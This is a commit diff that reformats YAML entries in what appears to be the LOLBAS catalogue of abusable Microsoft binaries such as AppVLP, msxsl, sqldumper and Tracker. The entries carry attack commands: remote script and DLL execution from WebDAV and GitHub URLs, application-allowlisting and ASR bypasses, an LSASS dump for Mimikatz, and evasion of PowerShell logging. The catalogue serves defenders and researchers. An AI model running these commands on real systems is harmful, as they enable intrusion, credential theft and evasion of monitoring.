Completed template update of OterMSBinaries

yml/OtherMSBinaries/Appvlp.yml

@@ -7,7 +7,7 @@ Commands:
   - Command: AppVLP.exe \\webdav\calc.bat
     Usecase: Execution of BAT file hosted on Webdav server.
     Description: Executes calc.bat through AppVLP.exe
-    Categories: ['Execution', 'ASR Bypass']
+    Category: Execution
     Privileges: User
     MitreID: T1218
     MitreLink: https://attack.mitre.org/wiki/Technique/T1218
@@ -15,7 +15,7 @@ Commands:
   - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"
     Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
     Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
-    Categories: ['Execution', 'ASR Bypass']
+    Category: Execution
     Privileges: User
     MitreID: T1218
     MitreLink: https://attack.mitre.org/wiki/Technique/T1218
@@ -23,7 +23,7 @@ Commands:
   - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
     Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
     Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
-    Categories: ['Execution', 'ASR Bypass']
+    Category: Execution
     Privileges: User
     MitreID: T1218
     MitreLink: https://attack.mitre.org/wiki/Technique/T1218

yml/OtherMSBinaries/Bginfo.yml

@@ -7,7 +7,7 @@ Commands:
   - Command: bginfo.exe bginfo.bgi /popup /nolicprompt
     Description: Execute VBscript code that is referenced within the bginfo.bgi file.
     Usecase: Local execution of VBScript
-    Categories: ['Execution', 'AWL Bypass']
+    Category: AWL Bypass
     Privileges: User
     MitreID: T1218
     MitreLink: https://attack.mitre.org/wiki/Technique/T1218
@@ -15,7 +15,7 @@ Commands:
   - Command: '"\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt'
     Usecase: Remote execution of VBScript
     Description: Execute bginfo.exe from a WebDAV server.
-    Categories: ['Execution', 'AWL Bypass']
+    Category: AWL Bypass
     Privileges: User
     MitreID: T1218
     MitreLink: https://attack.mitre.org/wiki/Technique/T1218
@@ -23,7 +23,7 @@ Commands:
   - Command: '"\\live.sysinternals.com\Tools\bginfo.exe" \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt'
     Usecase: Remote execution of VBScript
     Description: This style of execution may not longer work due to patch.
-    Categories: ['Execution', 'AWL Bypass']
+    Category: AWL Bypass
     Privileges: User
     MitreID: T1218
     MitreLink: https://attack.mitre.org/wiki/Technique/T1218

yml/OtherMSBinaries/Cdb.yml

@@ -1,12 +1,17 @@
 ---
 Name: Cdb.exe
-Description: Execute
-Author: ''
+Description: Debugging tool included with Windows Debugging Tools.
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
   - Command: cdb.exe -cf x64_calc.wds -o notepad.exe
     Description: Launch 64-bit shellcode from the x64_calc.wds file using cdb.exe.
+    Usecase: Local execution of assembly shellcode.
+    Category: Execution
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows
 Full Path:
   - C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
   - C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe
@@ -16,4 +21,6 @@ Resources:
   - http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
   - https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options
   - https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda
-Notes: Thanks to Matt Graeber - @mattifestation
+Acknoledgement:
+  - Person: Matt Graeber
+    Handle: '@mattifestation'

yml/OtherMSBinaries/Csi.yml

@@ -1,12 +1,17 @@
 ---
 Name: csi.exe
-Description: Execute
-Author: ''
+Description: Command line interface included with Visual Studio.
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
   - Command: csi.exe file
     Description: Use csi.exe to run unsigned C# code.
+    Usecase: Local execution of unsigned C# code.
+    Category: Execution
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows
 Full Path:
   - c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe
   - c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe
@@ -15,4 +20,6 @@ Detection: []
 Resources:
   - https://twitter.com/subTee/status/781208810723549188
   - https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
-Notes: Thanks to Casey Smith - @subtee
+Acknowledgement:
+  - Person: Casey Smith
+    Handle: '@subtee'

yml/OtherMSBinaries/Dnx.yml

@@ -1,17 +1,24 @@
 ---
 Name: dnx.exe
-Description: Execute
-Author: ''
+Description: .Net Execution environment file included with .Net.
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
   - Command: dnx.exe consoleapp
     Description: Execute C# code located in the consoleapp folder via 'Program.cs' and 'Project.json' (Note - Requires dependencies)
+    Usecase: Local execution of C# project stored in consoleapp folder.
+    Category: Execution
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows
 Full Path:
   - N/A
 Code Sample: []
 Detection: []
 Resources:
   - https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
-Notes: Thanks to Matt Nelson - @enigma0x3
+Acknowledgement:
+  - Person: Matt Nelson
+    Handle: '@enigma0x3'
 

yml/OtherMSBinaries/Dxcap.yml

@@ -1,12 +1,17 @@
 ---
 Name: Dxcap.exe
-Description: Execute
-Author: ''
+Description: DirectX diagnostics/debugger included with Visual Studio. 
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
   - Command: Dxcap.exe -c C:\Windows\System32\notepad.exe
     Description: Launch notepad as a subprocess of Dxcap.exe
+    Usecase: Local execution of a process as a subprocess of Dxcap.exe
+    Category: Execution
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows
 Full Path:
   - c:\Windows\System32\dxcap.exe
   - c:\Windows\SysWOW64\dxcap.exe
@@ -14,4 +19,6 @@ Code Sample: []
 Detection: []
 Resources:
   - https://twitter.com/harr0ey/status/992008180904419328
-Notes: Thanks to Matt harr0ey - @harr0ey
+Acknowledgement:
+  - Person: Matt harr0ey
+    Handle: '@harr0ey'

yml/OtherMSBinaries/Mftrace.yml

@@ -1,14 +1,25 @@
 ---
 Name: Mftrace.exe
-Description: Execute
-Author: ''
+Description: Trace log generation tool for Media Foundation Tools.
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
   - Command: Mftrace.exe cmd.exe
     Description: Launch cmd.exe as a subprocess of Mftrace.exe.
+    Usecase: Local execution of cmd.exe as a subprocess of Mftrace.exe.
+    Category: Execution
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows
   - Command: Mftrace.exe powershell.exe
     Description: Launch cmd.exe as a subprocess of Mftrace.exe.
+    Usecase: Local execution of powershell.exe as a subprocess of Mftrace.exe.
+    Category: Execution
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows
 Full Path:
   - C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86
   - C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64
@@ -18,4 +29,6 @@ Code Sample: []
 Detection: []
 Resources:
   - https://twitter.com/0rbz_/status/988911181422186496 (Currently not accessible)
-Notes: Thanks to fabrizio - @0rbz_
+Acknowledgement:
+  - Person: fabrizio
+    Handle: '@0rbz_'

yml/OtherMSBinaries/Msdeploy.yml

@@ -1,16 +1,23 @@
 ---
 Name: Msdeploy.exe
-Description: Execute
-Author: ''
+Description: Microsoft tool used to deploy Web Applications.
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
   - Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat"
     Description: Launch calc.bat via msdeploy.exe.
+    Usecase: Local execution of batch file using msdeploy.exe.
+    Category: Execution
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows
 Full Path:
   - C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\msdeploy.exe
 Code Sample: []
 Detection: []
 Resources:
   - https://twitter.com/pabraeken/status/995837734379032576
-Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
+Acknowledgement:
+  - Person: Pierre-Alexandre Braeken
+    Handle: '@pabraeken'

yml/OtherMSBinaries/Msxsl.yml

@@ -1,16 +1,27 @@
 ---
 Name: msxsl.exe
-Description: Execute
-Author: ''
+Description: Command line utility used to perform XSL transformations.
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
   - Command: msxsl.exe customers.xml script.xsl
     Description: Run COM Scriptlet code within the script.xsl file (local).
+    Usecase: Local execution of script stored in XSL file.
+    Category: AWL Bypass
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows
   - Command: msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
     Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
+    Usecase: Local execution of remote script stored in XSL script stored as an XML file.
+    Category: AWL Bypass
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows
 Full Path:
-  - N/A
+  - ''
 Code Sample: []
 Detection: []
 Resources:

yml/OtherMSBinaries/Rcsi.yml

@@ -1,15 +1,22 @@
 ---
 Name: rcsi.exe
-Description: Execute
-Author: ''
+Description: Non-Interactive command line inerface included with Visual Studio.
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
   - Command: rcsi.exe bypass.csx
     Description: Use embedded C# within the csx script to execute the code.
+    Usecase: Local execution of arbitrary C# code stored in local CSX file.
+    Category: AWL Bypass
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows
 Full Path: ''
 Code Sample: []
 Detection: []
 Resources:
   - https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/
-Notes: Thanks to Matt Nelson - @enigma0x3
+Acknowledgement:
+  - Person: Matt Nelson
+    Handle: '@enigma0x3'

yml/OtherMSBinaries/Sqldumper.yml

@@ -1,14 +1,25 @@
 ---
 Name: Sqldumper.exe
-Description: Dump process
-Author: ''
+Description: Debugging utility included with Microsoft SQL.
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
   - Command: sqldumper.exe 464 0 0x0110
     Description: Dump process by PID and create a dump file (Appears to create a dump file called SQLDmprXXXX.mdmp).
+    Usecase: Dump process uisng PID.
+    Category: Dump
+    Privileges: Administrator
+    MitreID: T1003
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1003
+    OperatingSystem: Windows
   - Command: sqldumper.exe 540 0 0x01100:40
     Description: 0x01100:40 flag will create a Mimikatz compatibile dump file.
+    Usecase: Dump LSASS.exe to Mimikatz compatable dump uisng PID.
+    Category: Dump
+    Privileges: Administrator
+    MitreID: T1003
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1003
+    OperatingSystem: Windows
 Full Path:
   - C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
   - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe
@@ -18,4 +29,6 @@ Resources:
   - https://twitter.com/countuponsec/status/910969424215232518
   - https://twitter.com/countuponsec/status/910977826853068800
   - https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se
-Notes: Thanks to Luis Rocha - @countuponsec
+Acknowledgement:
+  - Person: Luis Rocha
+    Handle: '@countuponsec'

yml/OtherMSBinaries/Sqlps.yml

@@ -1,16 +1,23 @@
 ---
 Name: Sqlps.exe
-Description: Execute, evade logging
-Author: ''
+Description: Tool included with Microsoft SQL Server that loads SQL Server cmdlets.
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
   - Command: Sqlps.exe -noprofile
     Description: Drop into a SQL Server PowerShell console without Module and ScriptBlock Logging.
+    Usecase: Execute PowerShell commands without ScriptBlock logging.
+    Category: Execution
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows
 Full Path:
   - C:\Program files (x86\Microsoft SQL Server\100\Tools\Binn\sqlps.exe
 Code Sample: []
 Detection: []
 Resources:
   - https://twitter.com/bryon_/status/975835709587075072
-Notes: Thanks to Bryon - @bryon_
+Acknowledgement:
+  - Person: Bryon
+    Handle: '@bryon_'

yml/OtherMSBinaries/Sqltoolsps.yml

@@ -1,16 +1,23 @@
 ---
 Name: SQLToolsPS.exe
-Description: Execute, evade logging
-Author: ''
+Description: Tool included with Microsoft SQL that loads SQL Server cmdlts. A replacement for sqlps.exe.
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
   - Command: SQLToolsPS.exe -noprofile -command Start-Process calc.exe
     Description: Run PowerShell scripts and commands.
+    Usecase: Execute PowerShell command.
+    Category: Execution
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows
 Full Path:
   - C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe
 Code Sample: []
 Detection: []
 Resources:
   - https://twitter.com/pabraeken/status/993298228840992768
-Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
+Acknowledgement:
+  - Person: Pierre-Alexandre Braeken
+    Handle: '@pabraeken'

yml/OtherMSBinaries/Te.yml

@@ -1,15 +1,22 @@
 ---
 Name: te.exe
-Description: Execute
-Author: ''
+Description: Testing tool included with Microsoft Test Authoring and Execution Framework (TAEF).
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
   - Command: te.exe bypass.wsc
     Description: Run COM Scriptlets (e.g. VBScript) by calling a Windows Script Component (WSC) file.
+    Usecase: Execute Visual Basic script stored in local Windows Script Component file.
+    Category: Execution
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows
 Full Path: ''
 Code Sample: []
 Detection: []
 Resources:
   - https://twitter.com/gn3mes1s/status/927680266390384640?lang=bg
-Notes: Thanks to Giuseppe N3mes1s - @gN3mes1s
+Acknowlegement:
+  - Person: Giuseppe N3mes1s
+    Handle: '@gN3mes1s'

yml/OtherMSBinaries/Tracker.yml

@@ -1,17 +1,23 @@
 ---
 Name: Tracker.exe
-Description: Execute
-Author: ''
+Description: Tool included with Microsoft .Net Framework.
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
   - Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
     Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.
+    Usecase: Injection of locally stored DLL file into target process.
+    Category: AWL Bypass
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows
 Full Path: ''
 Code Sample: []
 Detection: []
 Resources:
   - https://twitter.com/subTee/status/793151392185589760
   - https://attack.mitre.org/wiki/Execution
-
-Notes: Thanks to Casey Smith - @subTee
+Acknowledgment:
+  - Person: Casey Smith
+    Handle: '@subTee'

yml/OtherMSBinaries/Vsjitdebugger.yml

@@ -1,16 +1,23 @@
 ---
 Name: vsjitdebugger.exe
-Description: Execute
-Author: ''
+Description: Just-In-Time (JIT) debugger included with Visual Studio..
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
   - Command: Vsjitdebugger.exe calc.exe
     Description: Executes calc.exe as a subprocess of Vsjitdebugger.exe.
+    Usecase: Execution of local PE file as a subprocess of Vsjitdebugger.exe.
+    Category: Execution
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows
 Full Path:
   - c:\windows\system32\vsjitdebugger.exe
 Code Sample: []
 Detection: []
 Resources:
   - https://twitter.com/pabraeken/status/990758590020452353
-Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
+Acknowledgement:
+  - Person: Pierre-Alexandre Braeken
+    Handle: '@pabraeken'

yml/OtherMSBinaries/Winword.yml

@@ -1,12 +1,17 @@
 ---
 Name: winword.exe
-Description: Execute
-Author: ''
+Description: Document editor included with Microsoft Office.
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
   - Command: winword.exe /l dllfile.dll
     Description: Launch DLL payload.
+    Usecase: Execute a locally stored DLL using winword.exe.
+    Category: Execution
+    Privileges: User
+    MitreID: T1218
+    MItreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows
 Full Path:
   - c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
 Code Sample: []
@@ -14,4 +19,8 @@ Detection: []
 Resources:
   - https://twitter.com/vysecurity/status/884755482707210241
   - https://twitter.com/Hexacorn/status/885258886428725250
-Notes: Thanks to Vincent Yiu - @@vysecurity (Cmd), Adam - @Hexacorn (Internals)
+Acknowledgement:
+  - Person: Vincent Yiu (cmd)
+    Handle: '@@vysecurity'
+  - Person: Adam (Internals)
+    Handle: '@Hexacorn'